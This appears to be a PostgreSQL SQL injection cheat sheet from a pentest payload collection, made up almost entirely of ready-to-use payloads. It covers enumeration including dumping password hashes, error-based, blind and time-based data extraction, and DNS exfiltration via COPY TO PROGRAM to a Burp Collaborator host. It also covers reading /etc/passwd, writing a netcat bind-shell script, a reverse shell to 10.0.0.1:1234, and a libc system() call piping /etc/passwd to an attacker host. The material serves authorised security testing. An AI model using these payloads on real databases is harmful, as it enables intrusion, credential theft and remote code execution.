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# PostgreSQL Injection
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> PostgreSQL SQL injection refers to a type of security vulnerability where attackers exploit improperly sanitized user input to execute unauthorized SQL commands within a PostgreSQL database.
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## Summary
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* [PostgreSQL Comments](#postgresql-comments)
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* [PostgreSQL Enumeration](#postgresql-enumeration)
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* [PostgreSQL Methodology](#postgresql-methodology)
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* [PostgreSQL Error Based](#postgresql-error-based)
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* [PostgreSQL XML Helpers](#postgresql-xml-helpers)
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* [PostgreSQL Blind](#postgresql-blind)
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* [PostgreSQL Blind With Substring Equivalent](#postgresql-blind-with-substring-equivalent)
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* [PostgreSQL Time Based](#postgresql-time-based)
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* [PostgreSQL Out of Band](#postgresql-out-of-band)
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* [PostgreSQL Stacked Query](#postgresql-stacked-query)
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* [PostgreSQL File Manipulation](#postgresql-file-manipulation)
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* [PostgreSQL File Read](#postgresql-file-read)
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* [PostgreSQL File Write](#postgresql-file-write)
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* [PostgreSQL Command Execution](#postgresql-command-execution)
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* [Using COPY TO/FROM PROGRAM](#using-copy-tofrom-program)
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* [Using libc.so.6](#using-libcso6)
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* [PostgreSQL WAF Bypass](#postgresql-waf-bypass)
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* [Alternative to Quotes](#alternative-to-quotes)
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* [PostgreSQL Privileges](#postgresql-privileges)
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* [PostgreSQL List Privileges](#postgresql-list-privileges)
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* [PostgreSQL Superuser Role](#postgresql-superuser-role)
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* [References](#references)
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## PostgreSQL Comments
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| Type | Comment |
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| ------------------- | ------- |
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| Single-Line Comment | `--` |
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| Multi-Line Comment | `/**/` |
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## PostgreSQL Enumeration
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| Description | SQL Query |
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| ---------------------- | --------------------------------------- |
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| DBMS version | `SELECT version()` |
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| Database Name | `SELECT CURRENT_DATABASE()` |
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| Database Schema | `SELECT CURRENT_SCHEMA()` |
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| List PostgreSQL Users | `SELECT usename FROM pg_user` |
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| List Password Hashes | `SELECT usename, passwd FROM pg_shadow` |
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| List DB Administrators | `SELECT usename FROM pg_user WHERE usesuper IS TRUE` |
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| Current User | `SELECT user;` |
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| Current User | `SELECT current_user;` |
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| Current User | `SELECT session_user;` |
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| Current User | `SELECT usename FROM pg_user;` |
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| Current User | `SELECT getpgusername();` |
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## PostgreSQL Methodology
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| Description | SQL Query |
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| ---------------------- | -------------------------------------------- |
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| List Schemas | `SELECT DISTINCT(schemaname) FROM pg_tables` |
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| List Databases | `SELECT datname FROM pg_database` |
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| List Tables | `SELECT table_name FROM information_schema.tables` |
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| List Tables | `SELECT table_name FROM information_schema.tables WHERE table_schema='<SCHEMA_NAME>'` |
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| List Tables | `SELECT tablename FROM pg_tables WHERE schemaname = '<SCHEMA_NAME>'` |
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| List Columns | `SELECT column_name FROM information_schema.columns WHERE table_name='data_table'` |
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## PostgreSQL Error Based
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| Name | Payload |
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| ------------ | --------------- |
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| CAST | `AND 1337=CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC) -- -` |
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| CAST | `AND (CAST('~'\|\|(SELECT version())::text\|\|'~' AS NUMERIC)) -- -` |
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| CAST | `AND CAST((SELECT version()) AS INT)=1337 -- -` |
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| CAST | `AND (SELECT version())::int=1 -- -` |
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```sql
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CAST(chr(126)||VERSION()||chr(126) AS NUMERIC)
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CAST(chr(126)||(SELECT table_name FROM information_schema.tables LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)--
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CAST(chr(126)||(SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset)||chr(126) AS NUMERIC)--
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CAST(chr(126)||(SELECT data_column FROM data_table LIMIT 1 offset data_offset)||chr(126) AS NUMERIC)
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```
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```sql
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' and 1=cast((SELECT concat('DATABASE: ',current_database())) as int) and '1'='1
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' and 1=cast((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET data_offset) as int) and '1'='1
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' and 1=cast((SELECT column_name FROM information_schema.columns WHERE table_name='data_table' LIMIT 1 OFFSET data_offset) as int) and '1'='1
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' and 1=cast((SELECT data_column FROM data_table LIMIT 1 OFFSET data_offset) as int) and '1'='1
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```
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### PostgreSQL XML Helpers
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```sql
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SELECT query_to_xml('select * from pg_user',true,true,''); -- returns all the results as a single xml row
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```
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The `query_to_xml` above returns all the results of the specified query as a single result. Chain this with the [PostgreSQL Error Based](#postgresql-error-based) technique to exfiltrate data without having to worry about `LIMIT`ing your query to one result.
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```sql
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SELECT database_to_xml(true,true,''); -- dump the current database to XML
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SELECT database_to_xmlschema(true,true,''); -- dump the current db to an XML schema
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```
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Note, with the above queries, the output needs to be assembled in memory. For larger databases, this might cause a slow down or denial of service condition.
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## PostgreSQL Blind
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### PostgreSQL Blind With Substring Equivalent
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| Function | Example |
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| ----------- | ----------------------------------------------- |
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| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
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| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
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| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
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Examples:
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```sql
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' and substr(version(),1,10) = 'PostgreSQL' and '1 -- TRUE
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' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE
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```
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## PostgreSQL Time Based
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### Identify Time Based
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```sql
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select 1 from pg_sleep(5)
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;(select 1 from pg_sleep(5))
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||(select 1 from pg_sleep(5))
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```
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### Database Dump Time Based
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```sql
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select case when substring(datname,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from pg_database limit 1
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```
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### Table Dump Time Based
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```sql
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select case when substring(table_name,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from information_schema.tables limit 1
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```
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### Columns Dump Time Based
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```sql
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select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name limit 1
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select case when substring(column,1,1)='1' then pg_sleep(5) else pg_sleep(0) end from table_name where column_name='value' limit 1
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```
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```sql
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AND 'RANDSTR'||PG_SLEEP(10)='RANDSTR'
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AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
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AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
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```
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## PostgreSQL Out of Band
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Out-of-band SQL injections in PostgreSQL relies on the use of functions that can interact with the file system or network, such as `COPY`, `lo_export`, or functions from extensions that can perform network actions. The idea is to exploit the database to send data elsewhere, which the attacker can monitor and intercept.
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```sql
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declare c text;
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declare p text;
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begin
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SELECT into p (SELECT YOUR-QUERY-HERE);
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c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
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execute c;
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END;
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$$ language plpgsql security definer;
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SELECT f();
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```
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## PostgreSQL Stacked Query
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Use a semi-colon "`;`" to add another query
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```sql
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SELECT 1;CREATE TABLE NOTSOSECURE (DATA VARCHAR(200));--
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```
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## PostgreSQL File Manipulation
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### PostgreSQL File Read
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NOTE: Earlier versions of Postgres did not accept absolute paths in `pg_read_file` or `pg_ls_dir`. Newer versions (as of [0fdc8495bff02684142a44ab3bc5b18a8ca1863a](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) commit) will allow reading any file/filepath for super users or users in the `default_role_read_server_files` group.
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* Using `pg_read_file`, `pg_ls_dir`
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```sql
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select pg_ls_dir('./');
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select pg_read_file('PG_VERSION', 0, 200);
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```
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* Using `COPY`
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```sql
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CREATE TABLE temp(t TEXT);
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COPY temp FROM '/etc/passwd';
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SELECT * FROM temp limit 1 offset 0;
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```
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* Using `lo_import`
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```sql
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SELECT lo_import('/etc/passwd'); -- will create a large object from the file and return the OID
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SELECT lo_get(16420); -- use the OID returned from the above
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SELECT * from pg_largeobject; -- or just get all the large objects and their data
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```
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### PostgreSQL File Write
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* Using `COPY`
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```sql
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CREATE TABLE nc (t TEXT);
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INSERT INTO nc(t) VALUES('nc -lvvp 2346 -e /bin/bash');
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SELECT * FROM nc;
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COPY nc(t) TO '/tmp/nc.sh';
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```
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* Using `COPY` (one-line)
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```sql
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COPY (SELECT 'nc -lvvp 2346 -e /bin/bash') TO '/tmp/pentestlab';
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```
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* Using `lo_from_bytea`, `lo_put` and `lo_export`
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```sql
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SELECT lo_from_bytea(43210, 'your file data goes in here'); -- create a large object with OID 43210 and some data
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SELECT lo_put(43210, 20, 'some other data'); -- append data to a large object at offset 20
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SELECT lo_export(43210, '/tmp/testexport'); -- export data to /tmp/testexport
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```
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## PostgreSQL Command Execution
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### Using COPY TO/FROM PROGRAM
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Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with '`pg_execute_server_program`' to pipe to and from an external program using `COPY`.
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```sql
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COPY (SELECT '') TO PROGRAM 'getent hosts $(whoami).[BURP_COLLABORATOR_DOMAIN_CALLBACK]';
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COPY (SELECT '') to PROGRAM 'nslookup [BURP_COLLABORATOR_DOMAIN_CALLBACK]'
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```
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```sql
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CREATE TABLE shell(output text);
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COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f';
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```
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### Using libc.so.6
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```sql
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CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
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SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
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```
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## PostgreSQL WAF Bypass
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### Alternative to Quotes
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| Payload | Technique |
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| ------------------ | --------- |
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| `SELECT CHR(65)\|\|CHR(66)\|\|CHR(67);` | String from `CHR()` |
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| `SELECT $TAG$This` | Dollar-sign ( >= version 8 PostgreSQL) |
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## PostgreSQL Privileges
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### PostgreSQL List Privileges
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Retrieve all table-level privileges for the current user, excluding tables in system schemas like `pg_catalog` and `information_schema`.
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```sql
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SELECT * FROM information_schema.role_table_grants WHERE grantee = current_user AND table_schema NOT IN ('pg_catalog', 'information_schema');
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```
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### PostgreSQL Superuser Role
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```sql
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SHOW is_superuser;
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SELECT current_setting('is_superuser');
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SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
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```
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## References
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* [A Penetration Tester's Guide to PostgreSQL - David Hayter - July 22, 2017](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
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* [Advanced PostgreSQL SQL Injection and Filter Bypass Techniques - Leon Juranic - June 17, 2009](https://www.infigo.hr/files/INFIGO-TD-2009-04_PostgreSQL_injection_ENG.pdf)
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* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - GreenWolf - March 20, 2019](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
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* [Postgres SQL Injection Cheat Sheet - @pentestmonkey - August 23, 2011](http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet)
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* [PostgreSQL 9.x Remote Command Execution - dionach - October 26, 2017](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)
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* [SQL Injection /webApp/oma_conf ctx parameter - Sergey Bobrov (bobrov) - December 8, 2016](https://hackerone.com/reports/181803)
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* [SQL Injection and Postgres - An Adventure to Eventual RCE - Denis Andzakovic - May 5, 2020](https://pulsesecurity.co.nz/articles/postgres-sqli)
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